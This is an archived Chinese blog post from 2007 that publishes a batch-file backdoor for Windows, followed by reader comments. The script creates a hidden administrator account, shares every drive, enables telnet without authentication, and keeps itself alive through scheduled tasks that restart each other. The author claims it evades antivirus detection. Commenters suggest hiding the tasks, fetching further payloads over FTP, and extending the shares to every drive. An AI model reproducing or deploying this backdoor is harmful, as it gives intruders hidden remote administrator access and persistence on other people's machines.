BAT免杀后门_余弦函数

百度首页 | 百度空间

查看文章

BAT免杀后门

2007-05-21 16:00

@echo off
@attrib +r +s system.bat
@net user Guests 000 /add
@net localgroup administrators Guests /add
@sc config lanmanserver start= auto
@net start server
@net share C$=C:
@net share D$=D:
@net share E$=E:
@net share F$=F:
@net share G$=G:
@net share H$=H:
@net share I$=I:
@net share J$=J:
@net share K$=K:
@tlntadmn config sec = -ntlm
rem 设定身份验证机构：不认证

@sc config Schedule start= auto
@net stop "Task Scheduler"
@net start "Task Scheduler"
@echo at 10:00 %systemroot%\SYSTEM32\svchost.bat > %systemroot%\SYSTEM32\system.bat
@echo at 20:00 %systemroot%\SYSTEM32\svchost.bat >> %systemroot%\SYSTEM32\system.bat
@at 10:03 %systemroot%\SYSTEM32\system.bat
@at 20:03 %systemroot%\SYSTEM32\system.bat
@sc config NtlmSsp start= auto
@net start NtlmSsp
@sc config RpcSs start= auto
@net start RpcSs
@sc config tlntsvr start= auto
@net stop telnet
@net start telnet
@exit

将上面代码保存为svchost.bat，在C:\windows\system32下执行，代码运行过程中会在同目录下生成system.bat文件，svchost.bat利用Task Scheduler任务计划在规定的时间内执行system.bat，而system.bat又利用任务计划在规定时间内再次执行svchost.bat，它们就这样反复激活着对方！目的就的创建用户名为Guests、密码为000的管理员帐户，然后激活telnet服务，使得远程控制者可以telnet进来。

这个批处理单独使用并不好（容易被消灭），需要和其他恶意代码结合使用……上面代码来自网络收集，我在测试过程中对它进行了完善：由于telnet服务的依存服务有NtlmSsp与RpcSs，所以在开启telnet服务前解禁它们，这样的成功概率会大得多！这是绝对免杀的。

类别：黑笔记 | 添加到搜藏 | 浏览() | 评论 (15)

最近读者：

网友评论：

1

2007-05-21 19:27

加上这个吧
attrib %windir%\tasks\at*.job +s +h +r
这样在控制面板——计划任务里面就看不到用at建立的任务了，增加一点隐蔽性^_^

2

2007-05-21 20:48

哈哈~~~GOOD IDEAS。

3

2007-05-21 22:14

attrib %windir%\tasks\at*.job +s +h +r

这个VERY GOOD

4

2007-05-21 22:17

对于同一个内网比较有用!
system.bat
内可以写入连一个FTP
这样可以远程下载东西!
就像你说的加入一点恶意程序

5

2007-05-21 22:21

恩，目前我有个计划。。。

6

2007-05-21 23:36

另外可以试试schtasks命令，它是at的升级版，几乎可以实现在控制面板——计划任务里面的所有功能，运行
ms-its:C:\WINDOWS\Help\ntcmds.chm::/schtasks.htm
可以查看详细的帮助和例子，功能十分强大

7

2007-05-22 00:04

对了，你有没有见过空间不能发表文章的。
要提交时，提示：对不起，你输入的文章不够长，请返回！！

已经很长了，还是提示这个问题，肯定是数据库问题。
不知道去那里解决~！！

8

2007-05-22 09:36

telnet 防火墙之类的可以挡住吗?
学习ing
IH_mvh -说的我好象也碰到过,可能是限制了大小吧

9

2007-05-22 09:38

@echo at 10:00 %systemroot%\SYSTEM32\svchost.bat > %systemroot%\SYSTEM32\system.bat
@echo at 20:00 %systemroot%\SYSTEM32\svchost.bat >> %systemroot%\SYSTEM32\system.bat
@at 10:03 %systemroot%\SYSTEM32\system.bat
@at 20:03 %systemroot%\SYSTEM32\system.bat
为什么是10:00,20:00,10:03和20:03

10

2007-05-22 10:51

to 刺猬：真棒schtasks！替代at，确实很好！：）
to IH_mvh：百度只有文章最大字数的限制，没有最少字数的限制吧。我没遇到过这个情况。
to 秦迷：telnet防火墙可以阻挡，会提示。一般厉害的防火墙是这样的。至于我选择的时间是自己随便选的，其他时间也可以。这好像有点社会工程学的感觉。

11

2007-05-25 12:36

有意思，共享部分还可以改善。至于文章太短那位，请降低IE安全设定，那是AJAX惹的祸。

12

2007-05-25 12:38

有意思，共享部分还可以改善。至于文章太短那位，请降低IE安全设定，那是AJAX惹的祸。

13

2007-05-25 12:40

恩…删掉一个吧…浏览器有问题…

14

2007-05-25 13:08

对，共享部分可以来个for循环。

15

2007-05-25 13:32

不，不是循环而已，而是复合结构，直接把所有存在的盘符都共享。

©2008 Baidu